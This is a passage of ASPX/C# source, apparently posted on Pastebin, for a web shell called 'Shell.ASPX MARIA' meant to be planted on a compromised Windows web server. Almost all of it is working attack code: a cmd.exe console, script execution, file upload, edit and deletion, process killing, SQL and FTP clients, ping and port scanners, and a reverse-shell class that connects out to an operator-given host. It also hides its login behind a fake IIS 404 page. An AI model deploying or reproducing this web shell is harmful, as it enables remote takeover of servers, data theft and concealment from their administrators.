LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>"";Response.Write(SQLView); } catch (Exception e) {Response.Write(""<div class='alert'>"" + e.Message + ""</div>"");} finally{dRead.Close();dRead = null;conn.Close();conn = null;com.Dispose();com = null;}";
  344. String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
  345. using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
  346. System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreatePostgresSQLa + FileCreatePostgresSQLb + FileCreatePostgresSQLc + FileCreatePostgresSQLd + FileCreatePostgresSQLe + FileCreatePostgresSQLf + FileCreatePostgresSQLg + "%" + ">" + StyleHTML);
  347. SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=yes seamless=yes src=TEMP~.aspx?&host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
  348. }
  349. catch (Exception e)
  350. {
  351. Response.Write("<div class='alert'>" + e.Message + "</div>");
  352. }
  353. }
  354.  
  355. }
  356.  
  357.  
  358. // List Diretories and Files
  359. DirectoryInfo di = new DirectoryInfo(CurrentFolder);
  360.  
  361. String lastdirectory = Path.GetFullPath(Path.Combine(CurrentFolder, @"..\"));
  362.  
  363. Folders += string.Format("<tr><td><center><b>BACK DIRECTORY</b></center></a></td><td><a href='?Directory={0}'>..</a></td><td>Directory</td><td></td><td></td><td></td></tr>", lastdirectory);
  364.  
  365. foreach (DirectoryInfo curdir in di.GetDirectories())
  366. {
  367. string fstr = string.Format("<a href='?Directory={0}'>{1}</a>", HttpUtility.UrlEncode(CurrentFolder + "/" + curdir.Name), HttpUtility.HtmlEncode(curdir.Name));
  368. Folders += string.Format("<tr><td><center><b><a href=?DeleteDir="+HttpUtility.UrlEncode(CurrentFolder+ "/" + curdir.Name)+">[X]</b></center></a></td><td>{0}</td><td>Directory</td><td></td><td></td><td></td></tr>", fstr);
  369. //attributesOfFolder="";
  370. }
  371. foreach (FileInfo curfile in di.GetFiles())
  372. {
  373. FileAttributes attributes = File.GetAttributes(@curfile.FullName);
  374. if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden) {attributesOfFiles+="<a title='Hidden'>H</a>";}
  375. if ((attributes & FileAttributes.ReadOnly) == FileAttributes.ReadOnly) {attributesOfFiles+="<a title='Read'>R</a>";}else{attributesOfFiles+="<a title='Read'>R</a><a title='Write'>W</a>";}
  376. string fstr = string.Format("<a href='?View={0}' target='_blank'>{1}</a>", HttpUtility.UrlEncode(CurrentFolder + "/" + curfile.Name), HttpUtility.HtmlEncode(curfile.Name));
  377. string astr = string.Format("<b><i><center><a href='javascript:deletefile(\"{1}\")' title='Delete'>[X]</a> <a href='?Directory={0}&get={1}' title='Edict'>[E]</a> <a href='?Directory={0}&Download={1}' title='Download'>[D]</a> <a href='javascript:PopupBoxRenameFile(\"{0}\",\"{1}\");' title='Rename'>[R]</a></center></b></i>", HttpUtility.UrlEncode(CurrentFolder), HttpUtility.UrlEncode(CurrentFolder + "/" + curfile.Name));
  378. string Extension=HttpUtility.UrlEncode(curfile.Extension);
  379. Files += string.Format("<tr><td>{2}</td><td>{0}</td><td>{3} File</td><td>"+attributesOfFiles+"</td><td>"+curfile.CreationTime+"</td><td>{1:d} Kb</td></tr>", fstr, curfile.Length, astr, Extension);
  380. attributesOfFiles="";
  381. }
  382.  
  383. // Console CMD
  384. if (txtCmdIn.Text.Length > 0)
  385. {
  386. Process p = new Process();
  387. p.StartInfo.CreateNoWindow = true;
  388. p.StartInfo.FileName = "cmd.exe";
  389. p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
  390. p.StartInfo.UseShellExecute = false;
  391. p.StartInfo.RedirectStandardOutput = true;
  392. p.StartInfo.RedirectStandardError = true;
  393. p.StartInfo.WorkingDirectory = CurrentFolder;
  394. p.Start();
  395. lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
  396. txtCmdIn.Text = "";
  397. }
  398.  
  399. // Searcher
  400. if(!string.IsNullOrEmpty(Request.Form["Searcher"])){
  401. string startFolder = @CurrentFolder;
  402. ResultSearchOuput+="<script>DivShowAndHidden('Searcher');</script>";
  403. System.IO.DirectoryInfo dir = new System.IO.DirectoryInfo(startFolder);
  404. try{
  405. if(!string.IsNullOrEmpty(Request.Form["QueryExtentionSearch"])){foreach (System.IO.FileInfo file in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)){if(file.Extension == Request.Form["QueryExtentionSearch"]){ResultSearchOuput+="<br> Namefile : <b>"+file.FullName+"</b> Creation Time: <b><font color='green'>"+file.CreationTime+"</b></font>";}}}
  406. if(!string.IsNullOrEmpty(Request.Form["QueryNameSearch"])){foreach (System.IO.FileInfo file in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)){if(file.Name == Request.Form["QueryNameSearch"]){ResultSearchOuput+="<br> Namefile : <b>"+file.FullName+"</b> Creation Time: <b><font color='green'>"+file.CreationTime+"</b></font>";}}}
  407. if(!string.IsNullOrEmpty(Request.Form["QueryStringSearch"])){
  408. foreach (System.IO.FileInfo fi in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)) {
  409. int counte=0;
  410. string line; System.IO.StreamReader filetoRead = new System.IO.StreamReader(fi.FullName);
  411. String Patron=Request.Form["QueryStringSearch"];
  412. Regex regex = new Regex(Patron, RegexOptions.IgnoreCase | RegexOptions.IgnorePatternWhitespace);
  413. while((line = filetoRead.ReadLine()) != null) {counte+=1;if (regex.Match(line).Success == true){ResultSearchOuput+="<br> Namefile : <b>"+fi.FullName+"</b> Creation Time: <b><font color='green'>"+fi.CreationTime+"</font> Line: "+counte+"</b>";}}filetoRead.Close();}}
  414. }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
  415. if (ResultSearchOuput.Length == 67){ResultSearchOuput="<script>DivShowAndHidden('Searcher');</script><div class='alert'>SHELL.ASPX Message: No Match </div>";}
  416. }
  417.  
  418. // Getting Information Server
  419. String NameMachine=Environment.MachineName.ToString();
  420. String VersionOS=Environment.OSVersion.ToString();
  421. String ProcessorCountMachine=Environment.ProcessorCount.ToString();
  422. String UserNameMachine=Environment.UserName.ToString();
  423.  
  424. // Detected Lenguages Installed on system
  425. if (File.Exists(MainDrive+@"python27\python.exe")){Binaries+="<b><font color=green>Python 2.7</font></b> ";}
  426. if (File.Exists(MainDrive+@"python32\python.exe")){Binaries+="<b><font color=green>Python 3.2</font></b> ";}
  427. if (File.Exists(MainDrive+@"perl\bin\perl.exe")){Binaries+="<b><font color=blue>Perl</font></b> ";}
  428. if (File.Exists(MainDrive+@"ruby\ruby.exe")){Binaries+="<b><font color=red>Ruby</font></b> ";}
  429. if (File.Exists(MainDrive+@"ProgramData\Oracle\Java\javapath\java.exe")){Binaries+="<b><font color=coral>Java</font></b> ";}
  430. if (Binaries == ""){Binaries="No Binaries Detected...";}
  431.  
  432. // Run Scripts
  433. if(!string.IsNullOrEmpty(Request.Form["language"])){
  434. String ExtensionFile="";String BinLAN="";
  435. if(Request.Form["language"] == "batch"){ExtensionFile=".cmd";BinLAN="cmd.exe";}
  436. if(Request.Form["language"] == "vbs"){ExtensionFile=".vbs";BinLAN="cscript ";}
  437. using (System.IO.File.Create(@CurrentFolder+"scriptToRun"+ExtensionFile));
  438. System.IO.File.WriteAllText(@CurrentFolder+"scriptToRun"+ExtensionFile, Request.Form["content"]);
  439. Process p = new Process();
  440. p.StartInfo.CreateNoWindow = true;
  441. p.StartInfo.FileName = BinLAN;
  442. if(BinLAN=="cmd.exe"){p.StartInfo.Arguments = "/c "+@CurrentFolder+"scriptToRun"+ExtensionFile;}
  443. else{p.StartInfo.Arguments = @CurrentFolder+"scriptToRun"+ExtensionFile;}
  444. p.StartInfo.UseShellExecute = false;
  445. p.StartInfo.RedirectStandardOutput = true;
  446. p.StartInfo.RedirectStandardError = true;
  447. p.StartInfo.WorkingDirectory = CurrentFolder;
  448. p.Start();
  449. lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
  450. txtCmdIn.Text = "";
  451. File.Delete(@CurrentFolder+"scriptToRun"+ExtensionFile);
  452. }
  453.  
  454. // Process Magnament
  455. System.Text.StringBuilder sb = new StringBuilder();
  456. System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcesses();
  457. String VTTable="";
  458. foreach (System.Diagnostics.Process process in processes)
  459. {
  460. if(Request.QueryString["action"] != null){
  461. if(Request.QueryString["process"] == process.ProcessName){
  462. try{
  463. process.Kill();
  464. Response.Write("<div class='alert'>SHELL.ASPX Message: Process Killed</div>");
  465. }catch (Exception e){
  466. Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");
  467. }}}
  468. VTTable += string.Format("<tr><td><center><a href='?process={0}&action=kill' title='kill process'>[Kill]</a></td><td>{0}</td><td>{1}</td></tr>",process.ProcessName,process.WorkingSet64 / 1000);
  469. //Response.Write(VTTable);
  470. }
  471.  
  472. // Shell Reverse
  473. if (!string.IsNullOrEmpty(Request.Form["a"]))
  474. {
  475. try
  476. {
  477. start P = new start();
  478. String Hostname = Request.Form["u"];
  479. String PortListening = Request.Form["p"];
  480. Response.Write("<script>alert('SHELL.ASPX: Connecting with Host Remote ["+Hostname+":"+PortListening+"]')</script>");
  481. P.StartShell(Hostname, PortListening);
  482. }
  483. catch (Exception e)
  484. {
  485. Response.Write("<div class='alert'>SHELL.ASPX Message: " + e.Message + "</div>");
  486.  
  487. }
  488. }
  489.  
  490. // Intrutions General
  491. try{
  492. // Rename File
  493. if (!string.IsNullOrEmpty(Request.QueryString["Rename"])){File.Copy(Request.QueryString["file"],@CurrentFolder+Request.QueryString["Rename"]);File.Delete(Request.QueryString["file"]);Response.Redirect (MARIA);}
  494.  
  495. // Download File
  496. if (!string.IsNullOrEmpty(Request.QueryString["Download"])){Response.Clear();Response.ContentType = "application/octet-stream";Response.AddHeader("Content-Disposition", "attachment; filename="+Request.QueryString["Download"]);Response.WriteFile(Request.QueryString["Download"]);Response.Flush();Response.End();}
  497.  
  498. // Edictor
  499. if (!string.IsNullOrEmpty(Request.QueryString["get"])){Response.Write(" <title>Shell.ASPX MARIA - Editor</title><div style='font-size: 20px; background-color: red; color: #FFFFFF; text-align: left;'>Shell.APSX MARIA - Editor</h1><form method='POST' action='?Run'> <textarea name='content' style='height: 100%; width: 100%;'>");Response.WriteFile(Request.QueryString["get"]);Response.Write(" </textarea><input type='hidden' name='GetEdict' value='true'><input type='hidden' name='FileName' value='"+Request.QueryString["get"]+"'><input type='submit' value='Save'>");Response.End();}
  500.  
  501. // File to Edict
  502. if(!string.IsNullOrEmpty(Request.Form["GetEdict"])){File.Delete(Request.Form["FileName"]);try{String FileToEdict = Request.Form["FileName"];FileToEdict = FileToEdict.Replace("//","\\").Replace("/","\\");using (System.IO.File.Create(@FileToEdict));System.IO.File.WriteAllText(@FileToEdict, Request.Form["content"]);Response.Write("<div class='alert'>SHELL.ASPX Message: File Edicted</div>");}catch (Exception e) {Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}}
  503.  
  504. // Delete File
  505. if (!string.IsNullOrEmpty(Request.QueryString["Delete"])){File.Delete(Request.QueryString["Delete"]);Response.Redirect (MARIA);}
  506.  
  507. // View File
  508. if (!string.IsNullOrEmpty(Request.QueryString["View"])){Response.Write("<title>Shell.ASPX MARIA - View</title><div style='font-size: 20px; background-color: red; color: #FFFFFF; text-align: left;'>Shell.APSX MARIA - View</h1> <textarea name='content' style='height: 100%; width: 100%;'>");Response.WriteFile(Request.QueryString["View"]);Response.Write(" </textarea>");Response.End();}
  509.  
  510. // Delete Folder
  511. if (!string.IsNullOrEmpty(Request.QueryString["DeleteDir"])){System.IO.Directory.Delete(Request.QueryString["DeleteDir"]);Response.Redirect (MARIA);}
  512.  
  513. // Make New Folder
  514. if (!string.IsNullOrEmpty(Request.QueryString["NewFolder"])){System.IO.Directory.CreateDirectory(@CurrentFolder+Request.QueryString["NewFolder"]);Response.Redirect (MARIA);}
  515.  
  516. // Make New File
  517. if (!string.IsNullOrEmpty(Request.QueryString["NewFile"])){using (System.IO.File.Create(@CurrentFolder+Request.QueryString["NewFile"]));Response.Redirect (MARIA); }
  518.  
  519. // Upload File
  520. if(flUp.HasFile)
  521. {
  522. string fileName = flUp.FileName;
  523. int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
  524. if (splitAt >= 0)
  525. fileName = flUp.FileName.Substring(splitAt);
  526. flUp.SaveAs(CurrentFolder + "/" + fileName);
  527. Response.Redirect (MARIA);
  528. }
  529. }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
  530.  
  531. %>
  532. <script runat="server">
  533.  
  534. public class start
  535. {
  536. TcpClient tcpClient;
  537. NetworkStream networkStream;
  538. StreamWriter streamWriter;
  539. StreamReader streamReader;
  540. Process processCmd;
  541. StringBuilder strInput;
  542.  
  543. public void StartShell(string IPR, string PORR)
  544. {
  545.  
  546. tcpClient = new TcpClient();
  547. strInput = new StringBuilder();
  548.  
  549. try
  550. {
  551. int PORT = Convert.ToInt32(PORR);
  552. tcpClient.Connect(IPR, PORT);
  553. networkStream = tcpClient.GetStream();
  554. streamReader = new StreamReader(networkStream);
  555. streamWriter = new StreamWriter(networkStream);
  556. }
  557. catch (Exception err) { return; }
  558.  
  559. processCmd = new Process();
  560. processCmd.StartInfo.FileName = "cmd.exe";
  561. processCmd.StartInfo.CreateNoWindow = true;
  562. processCmd.StartInfo.UseShellExecute = false;
  563. processCmd.StartInfo.RedirectStandardOutput = true;
  564. processCmd.StartInfo.RedirectStandardInput = true;
  565. processCmd.StartInfo.RedirectStandardError = true;
  566. processCmd.OutputDataReceived += new
  567. DataReceivedEventHandler(CmdOutputDataHandler);
  568. processCmd.Start();
  569. processCmd.BeginOutputReadLine();
  570.  
  571. while (true)
  572. {
  573. try
  574. {
  575. strInput.Append(streamReader.ReadLine());
  576. strInput.Append("\n");
  577. if(strInput.ToString().LastIndexOf(
  578. "terminate") >= 0) StopServer();
  579. if(strInput.ToString().LastIndexOf(
  580. "exit") >= 0) throw new ArgumentException();
  581. processCmd.StandardInput.WriteLine(strInput);
  582. strInput.Remove(0, strInput.Length);
  583. }
  584. catch (Exception err)
  585. {
  586. Cleanup();
  587. break;
  588. }
  589. }
  590. }
  591.  
  592. private void Cleanup()
  593. {
  594. try { processCmd.Kill(); } catch (Exception err) { };
  595. streamReader.Close();
  596. streamWriter.Close();
  597. networkStream.Close();
  598. }
  599.  
  600. private void StopServer()
  601. {
  602. Cleanup();
  603. System.Environment.Exit(System.Environment.ExitCode);
  604. }
  605.  
  606. private void CmdOutputDataHandler(object sendingProcess,
  607. DataReceivedEventArgs outLine)
  608. {
  609. StringBuilder strOutput = new StringBuilder();
  610. if(!String.IsNullOrEmpty(outLine.Data))
  611. {
  612. try
  613. {
  614. strOutput.Append(outLine.Data);
  615. streamWriter.WriteLine(strOutput);
  616. streamWriter.Flush();
  617. }
  618. catch (Exception err) { }
  619. }
  620. }
  621. }//end class Form
  622. </script>
  623.  
  624. <!-- Shell MARIA / GUI -->
  625. <%
  626. // Login Security Shell
  627. String REQCOOKIE = "NOACCESS";
  628. if (Request.Cookies["UserSettings"] != null)
  629. {
  630. HttpCookie COOK = Request.Cookies.Get("UserSettings");
  631. if (COOK.Value == "Error="+PASSWORG_SHELL)
  632. {
  633. REQCOOKIE = "GRANTED";
  634. }
  635. }
  636. else
  637. {
  638. if (Request.Form["error"] == PASSWORG_SHELL)
  639. {
  640. HttpCookie myCookie = new HttpCookie("UserSettings");
  641. myCookie["Error"] = PASSWORG_SHELL;
  642. myCookie.Expires = DateTime.Now.AddDays(1d);
  643. Response.Cookies.Add(myCookie);
  644. REQCOOKIE = "GRANTED";
  645. }
  646. }
  647.  
  648. if (REQCOOKIE == "NOACCESS")
  649. {
  650. String SERVERERROR = @"
  651. <html>
  652. <head>
  653. <meta http-equiv=Content-Type content='text/html; charset=iso-8859-1'/>
  654. <title>404 - File or directory not found.</title>
  655. <style type=text/css>
  656. <!--
  657. body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
  658. fieldset{padding:0 15px 10px 15px;}
  659. h1{font-size:2.4em;margin:0;color:#FFF;}
  660. h2{font-size:1.7em;margin:0;color:#CC0000;}
  661. h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
  662. #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:'trebuchet MS', Verdana, sans-serif;color:#FFF;
  663. background-color:#555555;}
  664. #content{margin:0 0 0 2%;position:relative;}
  665. .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
  666. -->
  667. </style>
  668. </head>
  669. <body>
  670. <div id=header><h1>Server Error</h1></div>
  671. <div id=content>
  672. <div class=content-container><fieldset>
  673. <h2>404 - File or directory not found.<form method=post><input style='border: 0px;cursor: default;padding: inherit;' type=password name=error></form></h2>
  674. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
  675. </fieldset></div>
  676. </div>
  677. </body>
  678. </html>";
  679. Response.Write(SERVERERROR);
  680. }else{
  681. %>
  682. <html>
  683. <head>
  684. <title>SHELL</title>
  685. </head>
  686. <body>
  687. <style type="text/css">
  688. * {font-family: Arial; font-size: 12px;}
  689. body {margin: 0px; background-color: white}
  690. pre {font-family: Courier New; background-color: black; margin: 60px;}
  691. .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;}
  692. .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;}
  693. .boxer {font-size: 15px; text-align: left;}
  694. .tabla {width: 100%; border: 3px solid #000;overflow-x:auto}
  695. .footTable {width: 100%; border: 3px solid #000;overflow-x:auto}
  696. .cmdPromp {background-color: black; color: white;border: 3px solid #000;}
  697. h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
  698. th {text-align: left; background-color: black; color: white}
  699. td {background-color: #d7d7d7;}
  700. a:link {background-color: #d7d7d7; color: black}
  701. a:visited {background-color: #d7d7d7;}
  702. a:hover {background-color: red;}
  703. a:active {background-color: #d7d7d7;}
  704. #footer {width: 100%;height:81px;position:relative;bottom: 0;left: 0;}
  705. </style>
  706. <script language="JavaScript" type="text/javascript">
  707. <!--
  708. var ShellPROMPT = " SHELL.ASPX Message: \n";
  709. function Zanizar(value) { value = value.replace(/\/\//g, "\\"); value = value.replace(/\//g, "\\"); return value }
  710. function PopupBoxRenameFile(folder, file) { var string = prompt(ShellPROMPT + "Type the New Name for " + file + " file."); if (string != null) { folder = Zanizar(folder); file = Zanizar(file); window.location = "?file=" + file + "&Rename=" + string; } }
  711. function makeFolder() { var string = prompt(ShellPROMPT + "Type the New folder Name."); if (string != null) { alert(string); window.location = "?NewFolder=" + string; } }
  712. function makeFile() { var string = prompt(ShellPROMPT + "Type the New File Name."); if (string != null) { alert(string); window.location = "?NewFile=" + string; } }
  713. function DivShowAndHidden(DivName) { var e = document.getElementById(DivName); e.style.display = (e.style.display == 'block') ? 'none' : 'block'; }
  714. function GetFileDB(a) { var x = (a.value || a.options[a.selectedIndex].value); if (x == "SQLite") { DivShowAndHidden('FileNAMESQLite'); } }
  715. function GoFolder(folder){window.location = "?Directory="+folder; }
  716. function deletefile(file){if (confirm("Delete file : "+file+" ?") == true) {window.location = "?Delete="+file; } else {alert("Coward"); } }
  717. function Reloj() {
  718. if (!document.layers && !document.all && !document.getElementById)
  719. return
  720. var Digital = new Date()
  721. var hours = Digital.getHours()
  722. var minutes = Digital.getMinutes()
  723. var seconds = Digital.getSeconds()
  724. var d = new Date();
  725. var dn = "PM"
  726. if (hours < 12) { dn = "AM" } if (hours > 12) { hours = hours - 12 } if (hours == 0) { hours = 12 } if (minutes <= 9) { minutes = "0" + minutes } if (seconds <= 9) { seconds = "0" + seconds }
  727. myclock = hours + ":" + minutes + ":" + seconds + " " + dn + " % " + d.getDate() + "/" + (d.getMonth() + 1) + "/" + d.getFullYear() + " ID:<%= NameMachine +"<br> OS:"+ VersionOS %>"
  728. if (document.layers) { document.layers.liveclock.document.write(myclock); document.layers.liveclock.document.close() }
  729. else if (document.all) { liveclock.innerHTML = myclock }
  730. else if (document.getElementById) { document.getElementById("liveclock").innerHTML = myclock; setTimeout("Reloj()", 1000) }
  731. }
  732. window.onload = Reloj
  733. //-->
  734. </script>
  735. <div class="timer">Shell.ASPX MARIA<span style="position:absolute;left:80%;" id="liveclock"></div>
  736. <table class="tabla">
  737. <tr>
  738. <th scope="col">Commands</th>
  739. <th scope="col">Name</th>
  740. <th scope="col">Type</th>
  741. <th scope="col">Attributes</th>
  742. <th scope="col">Data Creation</th>
  743. <th scope="col">Size</th>
  744. </tr>
  745. <div class="footTable"><div class="boxer"> <a href="<%= MARIA %>"><input type="button" id="Dirs" value="Home"></a> Storages <%= Output %> Directory Current: <input type="text" id="CurrentFolder" style="width: 68%;" value="<%= CurrentFolder %>"> <input type="button" value="Go" onclick="GoFolder(document.getElementById('CurrentFolder').value)"> <input type="button" value="Make Folder" onclick="makeFolder()"><input type="button" onclick=" makeFile()" value="Make File"></div></div>
  746. <div class="Liste"> <%= Folders %> <%= Files %>
  747. <form id="form1" runat="server">
  748. <div class="footTable"> <b> Console</b> <asp:TextBox runat="server" ID="txtCmdIn" Width="88%" /><asp:Button runat="server" ID="cmdExec" Text="Execute" /></div><div class="cmdPromp">
  749. <pre>
  750. <h1>CMD::CONSOLE</h1>
  751. <asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre></div>
  752. </table><div class="footTable">Upload Files :
  753. <asp:FileUpload runat="server" ID="flUp" />
  754. <asp:Button runat="server" ID="cmdUpload" Text="Upload" /></div>
  755. </form>
  756. <div class="footTable">Binaries detected: <%= Binaries %> </div>
  757. <div class="footTable"><center> <center style="background-color: black; color: white; font-family: inherit; font-language-override: inherit; font-style: italic;"> <input type="button" onclick="javascript: DivShowAndHidden('CONSOLE')" value="Scripting"> % <input type="button" onclick=" javascript: DivShowAndHidden('SQLConnection')" value="SQL Client"> % <input type="button" onclick=" javascript: DivShowAndHidden('Tasklist')" value="Process"> % <input type="button" onclick=" javascript: DivShowAndHidden('Searcher')" value="Searcher"> % <input type="button" onclick=" javascript: DivShowAndHidden('FTP')" value="FTP Client"> % <input type="button" onclick="javascript: DivShowAndHidden('SRV')" value="Shell-Reverse"/> % <input type="button" onclick="javascript: DivShowAndHidden('PSCAN')" value="Ping-Scan" /> % <input type="button" onclick="javascript: DivShowAndHidden('PORTSCAN')" value="Port-Scan" /></</b></center>
  758. <div id="CONSOLE" style="display:none;"><br> Script Type:
  759. <form method="POST">
  760. <select name="language">
  761. <option value="batch">Batch</option>
  762. <option value="vbs">VBS</option>
  763. </select><input type="submit" value="Run."> <br>
  764. <textarea name="content" style='height: 100%; width: 100%;'>
  765. </textarea>
  766. </form>
  767. </div></div>
  768. <div id="Tasklist" style="display:none;">
  769. <table class="tabla">
  770. <tr>
  771. <th scope="col">Commands</th>
  772. <th scope="col">Name</th>
  773. <th scope="col">PID</th>
  774. </tr>
  775. <%= VTTable %>
  776. </table>
  777. </div>
  778. <div id="PSCAN" style="display:none;">
  779. <div class="footTable">
  780. <form id="PSCANForm" method="POST"><br>
  781. <center>
  782. Range.......... <input type="text" name="Range" value="127.0.0.%">
  783. Timeout........ <input type="text" name="Timeout" value="3000">(s)<br>
  784. <input type="submit" value="Scan"><br>
  785.  
  786. <%= PINGSCAN %>
  787.  
  788. </form></center>
  789. </div></div>
  790. <div id="PORTSCAN" style="display:none;">
  791. <div class="footTable">
  792. <form id="PORTSCANForm" method="POST"><br>
  793. <center>
  794. IP.......... <input type="text" name="IPSCAN" value="<%= Request.Form["IPSCAN"] %>">
  795. Ports....... <input type="text" name="Ports" value="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500,22,443,8080,8081,8082,8083,8443,1099,9090,9091,9092,9093,9094,9443,7001">(s)<br>
  796. <input type="submit" value="Scan"><br>
  797.  
  798. <%= PORTSCAN %>
  799.  
  800. </form></center>
  801. </div></div>
  802. <div id="Searcher" style="display:none;">
  803. <div class="footTable"><br><center>
  804. <form id="Form2" method="POST">
  805. <input type="hidden" name="Searcher" value="true">
  806. Name.......... <input type="text" name="QueryNameSearch" value=""><br>
  807. Extension... <input type="text" name="QueryExtentionSearch" value=""><br>
  808. Content....... <input type="text" name="QueryStringSearch" value=""><br>
  809. <br><input type="submit" value="I'm gonna get lucky?..."><br>
  810. <%= ResultSearchOuput %>
  811. </p></form>
  812. </center><br>
  813. </div></div>
  814. <div id="SQLConnection" style="display:none;">
  815. <div class="footTable"><br><center>
  816. <form id="SQLForm" method="POST">SQL Type:
  817. <select onchange="GetFileDB(this)" name="SQLProtocol">
  818. <option value="SQLServer">SQLServer</option>
  819. <option value="SQLite">SQLite</option>
  820. <option value="PostgreSQL">PostgreSQL</option>
  821. <option value="MySQL">Mysql</option>
  822. </select>
  823. Host:<input type="text" name="host" value="<%= Request.Form["host"] + Request.QueryString["host"]%>">
  824. Port:<input type="text" name="port" value="<%= Request.Form["port"] + Request.QueryString["port"]%>">
  825. Username:<input type="text" name="user" value="<%= Request.Form["user"] + Request.QueryString["user"]%>">
  826. Password:<input type="text" name="pass" value="<%= Request.Form["pass"] + Request.QueryString["pass"]%>">
  827. Database:<input type="text" name="database" value="<%= Request.Form["database"] + Request.QueryString["database"]%>">
  828.  
  829. <div id="FileNAMESQLite" style="display:none;">
  830. <br>SQLite Connection<br><br>
  831. DB File:<input type="text" name="filename" placeholder="C:/USER/RED/TEST.SQLITE" value="<%= Request.Form["filename"] + Request.QueryString["filename"]%>">
  832. Version: <select name="VersionSQLite">
  833. <option value=1>1.0</option>
  834. <option value=3>3.0</option>
  835. </select>
  836. </div>
  837.  
  838. <input type="submit" value="Connect">
  839. </form></center>
  840. <%= SQLView %>
  841. </div></div>
  842. <div id="FTP" style="display:none;">
  843. <div class="footTable"><br><center>
  844. <form id="Form3" method="POST">
  845. Host:<input type="text" name="host" value="<%= Request.Form["host"] %>">
  846. Username:<input type="text" name="user" value="<%= Request.Form["user"] %>">
  847. Password:<input type="text" name="pass" value="<%= Request.Form["pass"] %>">
  848. SSL:<input type="checkbox" name="database" value="">
  849. <input type="hidden" name="FTP" value="true">
  850. <input type="hidden" name="command" value="">
  851. <input type="submit" value="Connect">
  852. </form></center>
  853. <%= OutputFTPBuffer + OutputFTPStatus %>
  854. </div></div>
  855.  
  856. <div id="SRV" style="display:none;">
  857. <div class="footTable"><br><center>
  858. <form id="Form5" method="POST">
  859. Host:<input type="text" name="host" value="<%= Request.Form["host"] %>">
  860. Port:<input type="text" name="port" value="<%= Request.Form["port"] %>">
  861. <input type="hidden" name="a" value="Shell">
  862. <input type="submit" value="Connect">
  863. </form></center></div></div>
  864.  
  865. </html>
  866. <% } %>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!